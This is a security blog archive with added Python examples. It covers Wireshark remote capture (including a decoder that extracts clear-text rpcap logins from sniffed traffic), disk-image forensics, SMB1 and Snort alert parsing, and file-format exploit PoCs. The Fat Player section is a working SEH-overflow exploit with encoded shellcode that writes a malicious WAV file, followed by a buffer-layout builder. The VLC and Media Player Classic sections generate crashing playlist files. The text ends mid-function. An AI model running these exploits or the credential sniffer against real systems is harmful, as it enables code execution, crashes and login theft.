Monday, November 29, 2010

Wireshark: Remote Packet Capture, bit of Security

Wireshark/Ethereal is one of the best open source tools we have. I don't think there are individuals working in the networking domain (especially in IDS/IPS, firewalls etc.) who don't know Wireshark/tcpdump. If you are one, please, I want to see you ;-)

Wireshark has many features; here we focus on one of them, remote packet capture.

You need Wireshark 1.4.2, which bundles the WinPcap build that includes the remote capture daemon. Install it on both machines: the one where Wireshark will run and the capture will be taken (the client) and the one whose traffic we want to sniff (the server). On the server, start the "Remote Packet Capture Protocol v.0 (experimental)" service; it listens on TCP port 2002.


Once the service is running, start Wireshark on the client machine and go to Capture->Options. The Capture Options window shown below pops up.


In this window the Interface field in the top left corner has a drop-down menu; select "Remote" from it. A second window asks for the connection details: Host (the server's IP address) and Port (enter 2002).

Authentication:

Before the server lets us take a packet capture we have to authenticate to it successfully.



Under Authentication choose Password authentication. Null authentication is refused by the service unless it was explicitly started to allow it, and choosing it produces the error shown below.


Once authentication succeeds you can pick which of the server's interfaces to sniff, if it has more than one.



Security:

This is one of the genuinely useful features Wireshark gives its users. The downside is that the login credentials cross the network in clear text: the rpcap v0 protocol applies no encryption, not even a basic encoding to hide the password. Because the password is checked against an operating-system account on the server, anyone sniffing the path between client and server recovers a valid login for the capture host itself, not just for the capture session. At a minimum, restrict TCP port 2002 to the capture client, stop the service when it is not needed, and tunnel the session (for example over SSH) if it has to cross an untrusted network.


The service also exposes every interface of a multi-homed server, together with its IP addresses, to anyone who can authenticate.
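
Why the clear-text login matters is easiest to see by decoding the authentication message itself. The Python below is an added example, not code from this post or from the Wireshark/WinPcap projects: it builds and parses an rpcap v0 authentication request and scans a reassembled client-to-server byte stream for password logins, which is exactly what a sniffer on the path would do. The message layout (an 8-byte header of version, type, value and length in network byte order; authentication request type 8; a body of type, dummy, slen1, slen2 followed by the username and password bytes) is taken from libpcap's rpcap-protocol.h as I recall it and should be checked against your version; the credentials and the captured stream are constructed here.

```python
"""Decode rpcap v0 authentication requests to show the clear-text login.

Added example.  Layout assumed from libpcap's rpcap-protocol.h:
  rpcap_header: uint8 ver, uint8 type, uint16 value, uint32 plen (network order)
  rpcap_auth:   uint16 type, uint16 dummy, uint16 slen1, uint16 slen2,
                then slen1 bytes of username and slen2 bytes of password
"""
import struct

RPCAP_VERSION = 0
RPCAP_MSG_AUTH_REQ = 8        # assumed message-type value for the auth request
RPCAP_RMTAUTH_NULL = 0
RPCAP_RMTAUTH_PWD = 1

HEADER = struct.Struct("!BBHI")   # ver, type, value, plen
AUTH = struct.Struct("!HHHH")     # auth type, dummy, slen1, slen2


def build_auth_request(username, password=None):
    """Bytes an rpcap client sends to log in (null auth when password is None)."""
    if password is None:
        body = AUTH.pack(RPCAP_RMTAUTH_NULL, 0, 0, 0)
    else:
        u, p = username.encode(), password.encode()
        body = AUTH.pack(RPCAP_RMTAUTH_PWD, 0, len(u), len(p)) + u + p
    return HEADER.pack(RPCAP_VERSION, RPCAP_MSG_AUTH_REQ, 0, len(body)) + body


def parse_auth_request(data):
    """Return (auth_type, username, password) for a well-formed v0 auth
    request, or None for anything else (wrong version/type, truncated)."""
    if len(data) < HEADER.size:
        return None
    ver, mtype, _value, plen = HEADER.unpack_from(data)
    if ver != RPCAP_VERSION or mtype != RPCAP_MSG_AUTH_REQ:
        return None
    payload = data[HEADER.size:HEADER.size + plen]
    if len(payload) < AUTH.size:
        return None
    atype, _dummy, slen1, slen2 = AUTH.unpack_from(payload)
    if atype == RPCAP_RMTAUTH_NULL:
        return (atype, None, None)
    if atype != RPCAP_RMTAUTH_PWD or len(payload) < AUTH.size + slen1 + slen2:
        return None
    user = payload[AUTH.size:AUTH.size + slen1]
    pwd = payload[AUTH.size + slen1:AUTH.size + slen1 + slen2]
    # no encoding, no encryption: the credentials are the raw bytes on the wire
    return (atype, user.decode(errors="replace"), pwd.decode(errors="replace"))


def find_cleartext_logins(stream):
    """Walk a client->server byte stream message by message and collect every
    password login it carries; returns a list of (username, password)."""
    found = []
    off = 0
    while off + HEADER.size <= len(stream):
        ver, _mtype, _value, plen = HEADER.unpack_from(stream, off)
        if ver != RPCAP_VERSION:
            break
        parsed = parse_auth_request(stream[off:off + HEADER.size + plen])
        if parsed and parsed[0] == RPCAP_RMTAUTH_PWD:
            found.append((parsed[1], parsed[2]))
        off += HEADER.size + plen
    return found


if __name__ == "__main__":
    # constructed sample of what a sniffer between client and server sees
    captured = build_auth_request("capture-admin", "S3cret!")
    print(find_cleartext_logins(captured))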


I hope this post and this feature are useful to you :-)

Following articles might be of your interest
http://darshanams.blogspot.in/2012/05/cain-and-abel-password-cracking.html
http://darshanams.blogspot.in/2011/09/portable-document-files.html
http://darshanams.blogspot.in/2010/09/forensics-1-extracting-image.html
http://darshanams.blogspot.in/2011/05/snort-logging-alerts-to-syslog-server.html

Saturday, October 2, 2010

Forensics 2: Identifying File System and Extracting it

The advantages of analyzing disk images are that the investigators can:
a) preserve the digital crime-scene
b) obtain the information in slack space
c) access unallocated space, free space, and used space
d) recover file fragments, hidden or deleted files and directories
e) view the partition structure and
f) get date-stamp and ownership of files and folders.

Here we concentrate on extracting the file system, if any, from an image collected at the crime scene so that it can be analysed.

First, compute the md5 hash of the image under analysis so that its integrity can be verified later. The md5 algorithm produces a 128-bit "fingerprint" of a file, also known as a message digest; the md5sum utility prints it for a given file.

Next, identify the image with the file command. file classifies a file by testing its contents against a database of known byte patterns ("magic" numbers) and reports the first type that matches. For this image it reports an x86 boot sector. The boot sector is the first 512 bytes of a disk and the primary starting point for an operating system: on startup the machine loads those 512 bytes into memory and executes them, which runs the boot loader and starts the boot process.

file reports "x86 boot sector" because the signature value 0xAA55 is located at offset 0x1FE in the image (the last two bytes of the sector, stored as 55 AA); that test is defined in the magic database, "/usr/share/file/magic" on this system, which file consults.

Determining the File System type of the Image
Run the mmls utility from The Sleuth Kit against the image taken with dd to determine the partition layout and file system type, as shown below. The -t switch specifies the media management (partition table) type: dos, mac, bsd etc.

The output shows that the NTFS (New Technology File System) partition begins at sector 63: the last column of its row reads NTFS (0x07), and the Start column of the same row reads 0000000063. So every Sleuth Kit command run against the raw image must be given an offset of 63 sectors to address this file system.
mmls is a forensics utility that queries an image file and prints its partition tables and disk labels. It is the quickest way to determine the sector at which a partition begins and ends. Here it shows a single NTFS file system; the -t dos switch tells mmls to interpret a DOS (MBR) partition table.


The file system is then extracted with the dd.exe command. The input file is the raw image collected from the machine under forensic investigation; the block size is 512 bytes (one sector) and skip=63 skips sectors 0 through 62 (the boot sector and the unallocated gap before the partition), so the copy starts exactly at sector 63 where the NTFS file system begins. Giving count= the partition length in sectors from the mmls output stops the copy at the end of the partition rather than at the end of the disk.

The extracted file system image can then be mounted with the mount command (read-only and through a loop device, so that the evidence is not modified) and the mount verified with mount or df. fdisk -l lists partition tables, so it is useful on the whole-disk image; the extracted partition image carries no partition table.




After extraction, calculate the md5 of the extracted NTFS file system image as well and record it next to the hash of the whole image; mounting read-only ensures the hash still matches after analysis.



Extracting the File System from the image

Other useful mmls switches:
-b print partition sizes in bytes
-r recurse into DOS partitions and look for other partition tables
-v verbose

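The whole procedure above (check the 0xAA55 signature, read the partition table, carve the NTFS partition starting at its first sector, hash input and output) can be done in a few lines of code. The Python below is an added example, not the post's own commands, and it works on an in-memory disk image constructed here rather than on real evidence. The MBR layout it relies on (boot signature at 0x1FE, four 16-byte partition entries from 0x1BE, type 0x07 for NTFS, the OEM ID "NTFS    " at offset 3 of an NTFS boot sector) is standard; the start sector 63 and the dd command it prints mirror the post.

```python
"""Carve the NTFS partition out of a raw (dd) image: mmls + dd + md5sum in one script.
Added example; the sample image is constructed in memory."""
import hashlib
import io
import struct

SECTOR = 512
MBR_SIG_OFFSET = 0x1FE              # 0xAA55 lives here; this is what 'file' keys on
PART_TABLE_OFFSET = 0x1BE           # four 16-byte partition entries
NTFS_TYPE = 0x07
ENTRY = struct.Struct("<B3sB3sII")  # status, CHS start, type, CHS end, start LBA, sector count


def md5_hex(data):
    return hashlib.md5(data).hexdigest()


def md5_stream(f):
    """md5 of a file-like object, read in 1 MiB chunks (whole-disk images are big)."""
    f.seek(0)
    h = hashlib.md5()
    for chunk in iter(lambda: f.read(1 << 20), b""):
        h.update(chunk)
    return h.hexdigest()


def parse_mbr(sector0):
    """Return the non-empty partition entries, after checking the boot signature."""
    if len(sector0) < SECTOR:
        raise ValueError("need at least one 512-byte sector")
    if struct.unpack_from("<H", sector0, MBR_SIG_OFFSET)[0] != 0xAA55:
        raise ValueError("no x86 boot sector signature (0xAA55) at offset 0x1FE")
    parts = []
    for i in range(4):
        _st, _chs0, ptype, _chs1, start, count = ENTRY.unpack_from(
            sector0, PART_TABLE_OFFSET + 16 * i)
        if ptype and count:
            parts.append({"index": i, "type": ptype, "start": start,
                          "count": count, "end": start + count - 1})
    return parts


def extract_partition(image, start, count, out, bs=SECTOR):
    """Same copy as `dd if=image of=out bs=512 skip=<start> count=<count>`:
    seek past <start> sectors, copy <count> sectors, hashing on the way."""
    image.seek(start * bs)
    h = hashlib.md5()
    remaining = count * bs
    written = 0
    while remaining:
        chunk = image.read(min(remaining, 1 << 20))
        if not chunk:
            break                     # image shorter than the partition table claims
        out.write(chunk)
        h.update(chunk)
        written += len(chunk)
        remaining -= len(chunk)
    return written, h.hexdigest()


def is_ntfs_boot_sector(sector):
    """An NTFS volume's first sector carries the OEM ID 'NTFS    ' at offset 3."""
    return sector[3:11] == b"NTFS    "


def carve_ntfs(image):
    """Run the whole procedure on a file-like raw image; return the evidence values."""
    image.seek(0)
    ntfs = [p for p in parse_mbr(image.read(SECTOR)) if p["type"] == NTFS_TYPE]
    if not ntfs:
        raise ValueError("no NTFS (0x07) partition in the MBR")
    start, count = ntfs[0]["start"], ntfs[0]["count"]
    out = io.BytesIO()
    written, part_md5 = extract_partition(image, start, count, out)
    return {"image_md5": md5_stream(image), "start_sector": start, "sectors": count,
            "dd_command": f"dd if=image.dd of=ntfs.dd bs={SECTOR} skip={start} count={count}",
            "bytes": written, "partition_md5": part_md5,
            "ntfs_boot_ok": is_ntfs_boot_sector(out.getvalue()[:SECTOR])}


def build_sample_image(ntfs_start=63, ntfs_sectors=2048):
    """Constructed test data: an MBR with one NTFS entry at sector 63, an unallocated
    gap, then a minimal NTFS boot sector plus filler.  Not a real disk image."""
    mbr = bytearray(SECTOR)
    mbr[PART_TABLE_OFFSET:PART_TABLE_OFFSET + 16] = ENTRY.pack(
        0x80, b"\0\0\0", NTFS_TYPE, b"\0\0\0", ntfs_start, ntfs_sectors)
    mbr[MBR_SIG_OFFSET:MBR_SIG_OFFSET + 2] = b"\x55\xAA"
    boot = bytearray(SECTOR)
    boot[0:3] = b"\xEB\x52\x90"                  # jmp short + nop, as on a real NTFS volume
    boot[3:11] = b"NTFS    "
    boot[MBR_SIG_OFFSET:MBR_SIG_OFFSET + 2] = b"\x55\xAA"
    return (bytes(mbr) + b"\0" * SECTOR * (ntfs_start - 1)
            + bytes(boot) + b"\xAB" * SECTOR * (ntfs_sectors - 1))


def run_demo():
    return carve_ntfs(io.BytesIO(build_sample_image()))


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

The "dd_command" value is the point of the exercise: the skip count is the partition's start sector as printed by mmls, not one less, and the count keeps the extracted image at exactly the partition length so its hash is reproducible.
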
Tuesday, September 14, 2010

Forensics 1: Extracting an Image for Investigation

Forensic investigations are usually performed on static data (disk images) rather than on the live machine. Open source tools such as The Sleuth Kit (TSK) and commercial ones such as EnCase are available for the forensic analysis of a given image.
Let us look at how to take an image of a drive, hard disk, partition etc. Tools that can be used include dd and windd.
So what is an image? An image is a bit-by-bit copy of the hard disk, which includes slack and unallocated space and not only the files the operating system shows.
I used the dd.exe command to take the image of the computer under investigation.
dd is found by default on Linux. On Windows the dd.exe binary can be obtained alongside The Sleuth Kit (TSK) tools, or comes with Cygwin if that is installed.
First, list all the available drives (A:, B:, C: etc.) or partitions on the machine from which we want to collect the image.
Below is a snapshot of the dd command used to extract the image for investigation.
Be very cautious while collecting the image: nothing on the machine under analysis should change. So run the tools from a CD (or behind a write blocker) and redirect the image to an external drive or a network share rather than saving it on the local machine, and record the hash of the resulting image so the copy can later be shown to be unaltered.
dd can also be used to extract a file system from a raw image.
This is only a high-level overview of forensics; more articles will follow.
For further reading you can start from
http://en.wikipedia.org/wiki/Computer_forensics

Tuesday, August 10, 2010

VLC 1.0.5 M3U File Processing Stack Buffer Overflow

# VLC 1.0.5 M3U File Processing Stack Buffer Overflow: malicious playlist generator
print("VLC 1.0.5 M3U File Processing Stack Buffer Overflow")

handler = "ftp://"         # URL scheme, followed by an overlong path
buff = "D" * 134000        # 134000 bytes of filler to overflow the stack buffer

mal_buff = handler + buff

try:
    vlcm3u = open("vlcm3u_mem_corru.m3u", "w")
    vlcm3u.write(mal_buff)
    vlcm3u.close()
    print("\nMalicious M3U File Created . . . !!")
    print("[+] Coded by Praveen Darshanam")
except (IOError, OSError):
    print("\nUnable to Create File\n")

Fat Player 0.6b WAV File Processing Buffer Overflow (SEH)

#################################################################################################
# Stack-based buffer overflow in Fat Player 0.6b allows remote attackers to execute
# arbitrary code via a long string in a .wav file. NOTE: some of these details are
# obtained from third party information.
#
# References:
# http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-4962
# http://xforce.iss.net/xforce/xfdb/52713
# http://sourceforge.net/projects/fatplayer/
# http://www.exploit-db.com/exploits/9495/
#
# Tested on: Windows XP SP3, FatPlayer 0.6b
#
# This was strictly written for educational purposes. Use it at your own risk.
# The author will not bear any responsibility for any damages whatsoever.
#
# Author: Praveen Darshanam
# Email: praveen[underscore]recker[at]sify.com
# Blog: http://darshanams.blogspot.com
# Date: 10th August, 2010
#################################################################################################

print("\nFat Player 0.6b WAV File Processing Buffer Overflow (SEH)")

buff1 = b"D" * 4132                 # filler up to the SEH record
nseh = b"\xeb\x06\x90\x90"          # next SEH pointer: jmp short +6, over the handler address
seh_ppr = b"\x39\x1f\xd1\x72"       # SEH handler: 0x72D11F39, pop edi / pop / ret in msacm32.drv

noop = b"\x90" * 10                 # small nop sled the short jump lands on
code2exec = (b"\xdb\xc0\x31\xc9\xbf\x7c\x16\x70\xcc\xd9\x74\x24\xf4\xb1\x1e\x58\x31\x78\x18\x83\xe8\xfc\x03\x78\x68\xf4\x85\x30\x78\xbc\x65\xc9\x78\xb6\x23\xf5\xf3\xb4\xae\x7d\x02\xaa\x3a\x32\x1c\xbf\x62\xed\x1d\x54\xd5\x66\x29\x21\xe7\x96\x60\xf5\x71\xca\x06\x35\xf5\x14\xc7\x7c\xfb\x1b\x05\x6b\xf0\x27\xdd\x48\xfd\x22\x38\x1b\xa2\xe8\xc3\xf7\x3b\x7a\xcf\x4c\x4f\x23\xd3\x53\xa4\x57\xf7\xd8\x3b\x83\x8e\x83\x1f\x57\x53\x64\x51\xa1\x33\xcd\xf5\xc6\xf5\xc1\x7e\x98\xf5\xaa\xf1\x05\xa8\x26\x99\x3d\x3b\xc0\xd9\xfe\x51\x61\xb6\x0e\x2f\x85\x19\x87\xb7\x78\x2f\x59\x90\x7b\xd7\x05\x7f\xe8\x7b\xca")   # encoded shellcode

# pad the file out to 40000 bytes
buff2 = b"Z" * (40000 - len(buff1) - len(nseh) - len(seh_ppr) - len(noop) - len(code2exec))
mal_buff = buff1 + nseh + seh_ppr + noop + code2exec + buff2
try:
    fatpwav = open("fatplayerboseh.wav", "wb")   # binary mode: the shellcode bytes must not be re-encoded
    fatpwav.write(mal_buff)
    fatpwav.close()
    print("\nMalicious WAV File Created . . . !!")
    print("[+] Coded by Praveen Darshanam")
except (IOError, OSError):
    print("\nUnable to Create File\n")
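
The numbers in the SEH layout above (filler of 4132 bytes, nSEH of jmp short +6, a pop/pop/ret handler, then the nop sled) are easy to get subtly wrong. The following Python is an added example, not the original exploit: it builds the same kind of buffer from the PoC's offset, handler address and total size, reads the SEH record back out of the file and computes where the short jump lands, and checks the handler address for bytes a file parser would mangle. The payload here is a placeholder of int3 instructions, not shellcode, and the bad-character set is an assumption for the example.

```python
"""Build and sanity-check an SEH-overwrite buffer layout.
Added example; offset, handler and size are the values from the Fat Player PoC."""
import struct

OFFSET = 4132            # bytes of filler before the SEH record
HANDLER = 0x72D11F39     # pop edi / pop / ret in msacm32.drv
TOTAL = 40000            # file size the PoC pads to


def short_jmp(displacement):
    """x86 'jmp short rel8' (EB xx) padded to the 4-byte nSEH slot; the
    displacement counts from the end of the 2-byte instruction."""
    if not -128 <= displacement <= 127:
        raise ValueError("short jump out of range")
    return b"\xeb" + struct.pack("<b", displacement) + b"\x90\x90"


def address_bad_chars(addr, bad=b"\x00\x0a\x0d"):
    """Bytes of the little-endian address that the target's parser would mangle
    (assumed bad-character set; determine the real one per target)."""
    return {c for c in struct.pack("<I", addr) if c in bad}


def build_seh_buffer(offset=OFFSET, handler=HANDLER, payload=b"\xcc" * 16,
                     total=TOTAL, filler=b"D", pad=b"Z", sled=10):
    """Layout: filler*offset | nSEH (jmp +6) | SEH (handler) | nop sled | payload | pad.
    When the handler's pop/pop/ret fires, execution returns into nSEH; the jmp
    skips its own two padding bytes and the four handler bytes and lands on the sled."""
    if address_bad_chars(handler):
        raise ValueError("handler address contains bad characters")
    core = (filler * offset + short_jmp(6) + struct.pack("<I", handler)
            + b"\x90" * sled + payload)
    if len(core) > total:
        raise ValueError("layout longer than total size")
    return core + pad * (total - len(core))


def seh_layout(buf, offset=OFFSET):
    """Read the SEH record back from a buffer and work out where the jump lands."""
    nseh = buf[offset:offset + 4]
    handler = struct.unpack("<I", buf[offset + 4:offset + 8])[0]
    if nseh[0:1] != b"\xeb":
        raise ValueError("nSEH is not a short jump")
    disp = struct.unpack("<b", nseh[1:2])[0]
    landing = offset + 2 + disp
    return {"nseh": nseh, "handler": handler, "jmp_lands_at": landing,
            "lands_on_nop": buf[landing:landing + 1] == b"\x90"}


if __name__ == "__main__":
    buf = build_seh_buffer()
    print(seh_layout(buf))
```

Two things the check cannot do for you: the handler must come from a module built without SafeSEH (the PoC picked msacm32.drv for that reason), and the offset 4132 only holds for the build that was tested; re-derive it with a cyclic pattern on any other version.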

Thursday, July 22, 2010

Media Player Classic - Home Cinema 1.3.1333.0 M3U File Heap Overflow/DoS (0-Day)

# Vulnerability Found: Praveen Darshanam
# Coded: Praveen Darshanam
# Greetz to all Andhra Hackers and ICW Members
# http://www.darshanams.blogspot.com
##########PoC Start################

print("\n*****Program needs to be run on Python 3.1*****")
print("""Media Player Classic - Home Cinema 1.3.1333.0 M3U File DoS (0-Day)

Tested on:
Windows XP SP3
Media Player Classic - Home Cinema
        Build number: 1.3.1333.0
        MPC Compiler: VS 2008
        FFmpeg Compiler: GCC 4.4.1
""")

head = "EXTM3U"          # playlist header as used in this PoC
buf = "D" * 1000         # around 1000 bytes is enough to trigger the C++ runtime exception
mal_buf = head + buf
#print("mal_buf:", mal_buf)
try:
    mpc_mal = open("mpc_m3u_crash.m3u", 'w')
    mpc_mal.write(mal_buf)
    mpc_mal.close()
    print("File Created Successfully: mpc_m3u_crash.m3u\n")
except OSError:
    print("Cannot Create M3U File\n")

print ("[+] Found and Coded by: Praveen Darshanam\r\n")
##########PoC End################

When the M3U file is around 1000 bytes, the "C++ Runtime Error" exception shown below is thrown.


If the buffer is increased further, Media Player Classic shows the error below but does not crash.


M3U files between roughly 950 and 2000 bytes throw the exceptions above and crash the player intermittently. The crash report, with the C++ exception, is shown below.

--------------CRASH REPORT START----------------------
ModLoad: 77be0000 77bf5000 C:\WINDOWS\system32\MSACM32.dll
ModLoad: 77bd0000 77bd7000 C:\WINDOWS\system32\midimap.dll
ModLoad: 73ee0000 73ee4000 C:\WINDOWS\system32\KsUser.dll
ModLoad: 10000000 100fb000 C:\Program Files\K-Lite Codec Pack\Filters\vsfilter.dll
ModLoad: 590b0000 590ce000 C:\WINDOWS\system32\wmpasf.dll
ModLoad: 71b20000 71b32000 C:\WINDOWS\system32\MPR.dll
ModLoad: 6bf50000 6bfcd000 C:\WINDOWS\system32\dxmasf.dll
ModLoad: 02530000 0257f000 C:\WINDOWS\system32\DRMClien.DLL
(6dc.cec): C++ EH exception - code e06d7363 (!!! second chance !!!)
eax=01c2f2e4 ebx=80040218 ecx=00000000 edx=00200003 esi=01c2f36c edi=003fd08c
eip=7c812aeb esp=01c2f2e0 ebp=01c2f334 iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\WINDOWS\system32\kernel32.dll -
kernel32!RaiseException+0x52:
7c812aeb 5e pop esi
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
Missing image name, possible paged-out or corrupt data.
0:004> g
WARNING: Continuing a non-continuable exception
(6dc.cec): Break instruction exception - code 80000003 (first chance)
eax=01c2f2e4 ebx=80040218 ecx=00000000 edx=00200003 esi=00000000 edi=003fd08c
eip=0071d14b esp=01c2f37c ebp=01c2f39c iopl=0 nv up ei pl nz na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000206
mpc_hc+0x31d14b:
0071d14b cc int 3

-----------CRASH REPORT END-------------------

Monday, July 12, 2010

Server Message Block (SMB) Protocol Dissection

SMB is a client-server protocol that gives clients shared access to files, printers and named pipes on a server; its primary use is file transfer within a LAN. It is carried over NetBIOS on TCP port 139 or directly over TCP port 445. The structures below are those of SMB1 (CIFS): every message starts with the fixed 32-byte header, whose multi-byte fields are little-endian, followed by a parameter block and a data block.

SMB Header Structure:
SMB_Header
{
UCHAR Protocol[4];
UCHAR Command;
SMB_ERROR Status;
UCHAR Flags;
USHORT Flags2;
USHORT PIDHigh;
UCHAR SecurityFeatures[8];
USHORT Reserved;
USHORT TID;
USHORT PIDLow;
USHORT UID;
USHORT MID;
}

SMB Parameter Block:

SMB_Parameters
{
UCHAR WordCount;
USHORT Words[WordCount] (variable);
}


SMB Data Block:
SMB_Data
{
USHORT ByteCount;
UCHAR Bytes[ByteCount] (variable);
}

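Put together, the three structures describe a complete SMB1 message. The Python below is an added example, not from the post or from Microsoft's specification text: it packs and unpacks the header, parameter block and data block exactly as laid out above, and decodes the data block of a Negotiate Protocol Request (command 0x72), whose bytes are a run of 0x02-prefixed, NUL-terminated dialect names. The sample message is constructed here; its Flags and Flags2 values are arbitrary and the pid/mid values are placeholders.

```python
"""Parse and build SMB1 messages from the header/parameter/data structures.
Added example; the Negotiate request is constructed, not captured."""
import struct

# Protocol[4], Command, Status, Flags, Flags2, PIDHigh, SecurityFeatures[8],
# Reserved, TID, PIDLow, UID, MID  -> 32 bytes, little-endian
SMB_HEADER = struct.Struct("<4sBIBHH8sHHHHH")
SMB_MAGIC = b"\xffSMB"
SMB_COM_NEGOTIATE = 0x72


def parse_smb1(data):
    """Split an SMB1 message into header fields, parameter words and data bytes.
    Raises ValueError when the declared lengths do not fit the buffer."""
    if len(data) < SMB_HEADER.size:
        raise ValueError("short SMB header")
    (proto, command, status, flags, flags2, pid_high, sec_features, _reserved,
     tid, pid_low, uid, mid) = SMB_HEADER.unpack_from(data)
    if proto != SMB_MAGIC:
        raise ValueError("not an SMB1 message (missing \\xffSMB)")
    off = SMB_HEADER.size
    word_count = data[off]                      # SMB_Parameters.WordCount
    off += 1
    words = data[off:off + 2 * word_count]      # Words[WordCount], 16-bit each
    if len(words) != 2 * word_count:
        raise ValueError("truncated parameter block")
    off += 2 * word_count
    if len(data) < off + 2:
        raise ValueError("missing ByteCount")
    (byte_count,) = struct.unpack_from("<H", data, off)   # SMB_Data.ByteCount
    off += 2
    payload = data[off:off + byte_count]        # Bytes[ByteCount]
    if len(payload) != byte_count:
        raise ValueError("truncated data block")
    return {"command": command, "status": status, "flags": flags, "flags2": flags2,
            "pid": (pid_high << 16) | pid_low, "tid": tid, "uid": uid, "mid": mid,
            "security_features": sec_features, "word_count": word_count,
            "words": words, "byte_count": byte_count, "data": payload,
            "trailing": data[off + byte_count:]}


def is_valid_smb1(data):
    try:
        parse_smb1(data)
        return True
    except ValueError:
        return False


def negotiate_dialects(data_block):
    """Data block of a Negotiate request: 0x02 followed by a NUL-terminated name, repeated."""
    dialects = []
    i = 0
    while i < len(data_block):
        if data_block[i] != 0x02:
            raise ValueError("bad buffer format byte at %d" % i)
        end = data_block.index(b"\x00", i + 1)
        dialects.append(data_block[i + 1:end].decode("ascii"))
        i = end + 1
    return dialects


def build_negotiate(dialects, pid=0x1234, mid=1):
    """Constructed Negotiate Protocol Request: WordCount 0, dialect list in the data block."""
    data = b"".join(b"\x02" + d.encode("ascii") + b"\x00" for d in dialects)
    header = SMB_HEADER.pack(SMB_MAGIC, SMB_COM_NEGOTIATE, 0, 0x18, 0xC853,
                             pid >> 16, b"\x00" * 8, 0, 0, pid & 0xFFFF, 0, mid)
    return header + b"\x00" + struct.pack("<H", len(data)) + data


if __name__ == "__main__":
    msg = build_negotiate(["NT LM 0.12", "SMB 2.002"])
    parsed = parse_smb1(msg)
    print(hex(parsed["command"]), negotiate_dialects(parsed["data"]))
```

The length checks are the part worth copying: WordCount and ByteCount are attacker-controlled in any message a server receives, and a dissector that trusts them without comparing against the bytes actually present reads past the buffer.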

For further details
http://msdn.microsoft.com/en-us/library/ee441466%28v=PROT.13%29.aspx
http://www.hsc.fr/ressources/articles/win_net_srv/

Monday, June 28, 2010

Snort Preprocessors and Alerts



Snort Preprocessors

Preprocessors were introduced in Snort v1.5. Preprocessor code runs after the packet has been decoded but before the detection engine is called, so at that stage a packet can be modified or analysed in an out-of-band manner. Preprocessors normalise traffic and identify possible attack packets before the rules are applied; after the preprocessing stage the detection engine matches the rules against the (possibly reassembled or decoded) packet data to detect attacks by pattern match. Preprocessors are configured in the snort.conf file, usually found in /etc/ or /etc/snort/. Use either frag2 or frag3, and either stream4 or stream5, never both: comment out frag2 when frag3 is used, and stream4 (with stream4_reassemble) when stream5 is used.

preprocessor frag2
preprocessor frag3          # IP fragment reassembly (defragmentation)
preprocessor stream4: detect_scans
preprocessor stream4_reassemble
preprocessor stream5        # TCP stream reassembly, stateful protocol analysis
preprocessor http_decode    # HTTP normalisation of URL-encoded data
preprocessor rpc_decode
preprocessor bo             # Back Orifice backdoor traffic detection
preprocessor telnet_decode
preprocessor sf_portscan    # detects various port scans
preprocessor sf_ssh
preprocessor sf_smtp
preprocessor sf_ftptelnet
preprocessor sf_dns
preprocessor sf_dcerpc
preprocessor sf_ssl

(Comments in snort.conf start with #. The sf_* entries are the names of the dynamic preprocessor libraries, libsf_<name>_preproc.so, which must be loaded with a dynamicpreprocessor directive; the configuration keywords used in snort.conf are the short names ssh, smtp, ftp_telnet, dns, dcerpc2 and ssl, each followed by its own options.)

Snort also has output plug-ins, sometimes called post-processors. These decide what happens after traffic has been identified as malicious by a preprocessor or a rule. Popular ones send Snort alerts and log data to databases or to a syslog server, or allow SNMP event messaging.


Snort Alerts

Snort alerts written to a log file look like this (the alerts in your environment will differ):
[**] [1:2050:14] SQL version overflow attempt [**]
[**] [1:8428:9] WEB-MISC SSLv2 openssl get shared ciphers overflow attempt [**]
[**] [122:3:0] (portscan) TCP Portsweep [**]
[**] [119:4:1] (http_inspect) BARE BYTE UNICODE ENCODING [**]

The first number (1, 122, 119 here) is the Generator ID, this tells the user what component of Snort generated this alert. List of GIDs can be found at etc/generators in the Snort source.

The generators file has the format shown below:
generatorid || alertid || MSG
The diagram below shows the generator ID, the alert ID (Snort ID) and the alert name.


Any alert from the ARP spoofing and spp_fnord preprocessors carries the Generator ID 112 or 114 respectively.

The second number (2050, 8428, 3, 4 here) is the Snort ID (SID, or Signature ID). Preprocessor SIDs are listed in etc/gen-msg.map; rule-based SIDs are written directly into the rules with the "sid" option.

The third number (14, 9, 0, 1 in the alerts above) is the revision ID. It is used when writing signatures: each re-edit or fine-tuning of a rule should increment this number with the "rev" option, so the "SQL version overflow attempt" signature above is at its 14th revision. Note that a GID:SID pair identifies an alert across revisions; the message text is only a label.

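The alert format described above is regular enough to parse. The Python below is an added example, not from this post: it breaks the four alert lines shown above into generator ID, Snort ID, revision and message, decides whether each came from the rules engine or a preprocessor, and checks preprocessor alerts against a gen-msg.map style table. The generator-name table and the gen-msg.map excerpt are constructed to match the four alerts (the real files in etc/ of the Snort source are much longer), and the function names are mine.

```python
"""Parse '[**] [gid:sid:rev] msg [**]' Snort alert lines and resolve their origin.
Added example; the lookup tables are constructed excerpts."""
import re

ALERT_RE = re.compile(r"\[\*\*\]\s*\[(\d+):(\d+):(\d+)\]\s*(.*?)\s*\[\*\*\]")

# constructed: generator id -> component, after etc/generators
GENERATORS = {1: "rules", 112: "arpspoof", 114: "fnord",
              119: "http_inspect", 122: "portscan"}

# constructed excerpt in gen-msg.map format: gid || sid || msg
GEN_MSG_MAP = """\
# gid || sid || msg
119 || 4 || (http_inspect) BARE BYTE UNICODE ENCODING
122 || 3 || (portscan) TCP Portsweep
"""

# the four alert lines from the post
SAMPLE_ALERTS = """\
[**] [1:2050:14] SQL version overflow attempt [**]
[**] [1:8428:9] WEB-MISC SSLv2 openssl get shared ciphers overflow attempt [**]
[**] [122:3:0] (portscan) TCP Portsweep [**]
[**] [119:4:1] (http_inspect) BARE BYTE UNICODE ENCODING [**]
"""


def load_gen_msg_map(text):
    """Parse 'gid || sid || msg' lines into {(gid, sid): msg}, skipping comments."""
    table = {}
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        gid, sid, msg = (field.strip() for field in line.split("||", 2))
        table[(int(gid), int(sid))] = msg
    return table


def parse_alert(line, gen_msg=None):
    """Return a dict for one alert line, or None if the line is not an alert."""
    m = ALERT_RE.search(line)
    if not m:
        return None
    gid, sid, rev = (int(x) for x in m.group(1, 2, 3))
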